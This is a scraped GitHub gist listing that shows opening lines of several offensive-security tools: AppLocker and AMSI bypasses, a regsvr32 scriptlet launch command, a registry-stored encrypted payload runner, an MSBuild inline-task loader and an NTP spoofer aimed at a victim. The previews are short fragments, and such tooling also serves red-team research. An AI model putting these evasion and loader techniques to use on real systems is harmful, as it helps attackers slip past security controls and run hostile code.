TheWover
/ Win10Bypass.cs
Created
February 19, 2019 19:44
— forked from nicholasmckinney/Win10Bypass.cs
Windows 10 Prototype Bypass Applocker
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
| Step One: |
TheWover
/ example.sct
Created
February 19, 2019 19:44
— forked from nicholasmckinney/example.sct
SCT File Obfuscation Examples:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| //x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll |
TheWover
/ RegRunner.cs
Created
February 19, 2019 19:47
— forked from nicholasmckinney/RegRunner.cs
Executes Encrypted File From Registry
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using Microsoft.Win32; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; |
TheWover
/ Utility.cs
Created
February 19, 2019 19:48
— forked from nicholasmckinney/Utility.cs
InstallUtility Functions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; |
TheWover
/ AMSIScanBufferBypass.cs
Last active
October 5, 2021 11:20
Working full program for AMSIScanBufferBypass from Cyber Ark: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace AMSIBypass2 | |
| { | |
| class Program | |
| { | |
| [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] | |
| static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName); |
TheWover
/ DeserializeAssembly.cs
Last active
May 24, 2019 19:15
PoC that serializes, then deserializes an Assembly using BinaryFormatter, then runs it. Derived from DotNet2JScript's logic
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** Uses object serialization to create a delegate for Assembly.Load. Passes the delegate as Base64. | |
| * Deserializes the Base64 into a Delegate and invokes it. | |
| * Means that you do not directly call Assembly.Load and your Assembly can be passed around in a wrapper format. | |
| * Still subject to AMSI in v4.8+. | |
| * | |
| * Author: The Wover | |
| * | |
| **/ |
TheWover
/ ntpspoof.py
Created
March 8, 2019 21:31
— forked from Dbof/ntpspoof.py
NTP spoofer to change the date of any victim to the year 2035
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import sys | |
| import time | |
| from subprocess import Popen, DEVNULL | |
| import datetime | |
| from scapy.all import IP, UDP, NTP | |
| from netfilterqueue import NetfilterQueue | |
| def get_switch_ip(): |
TheWover
/ JankyAF.csproj
Created
April 1, 2019 19:05
— forked from bohops/JankyAF.csproj
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > |
TheWover
/ com.cpp
Created
May 5, 2019 21:33
— forked from Alexhuszagh/com.cpp
Example Using COM IDispatch Interface
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** Example using the COM interface without AutoCOM. The entire | |
| * file can be automated with AutoCOM in under 15-lines of code. | |
| * | |
| * #include "autocom.hpp" | |
| * int main(int argc, char *argv[]) | |
| * { | |
| * com::Bstr text; | |
| * com::Dispatch dispatch("VBScript.RegExp"); | |
| * dispatch.put("Pattern", L"\\w+"); | |
| * for (auto match: dispatch.iter("Execute", L"A(b) c35 d_[x] yyy")) { |
TheWover
/ Base64EncodeFile.ps1
Created
May 18, 2019 15:02
Base64 encode a file and copy it to the clipboard using PowerShell. Posted as a Gist mainly for my own sake so that I don't have to Google the syntax every two days.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $filename = "C:\\Testing\donut\\payload.bin" | |
| [Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip |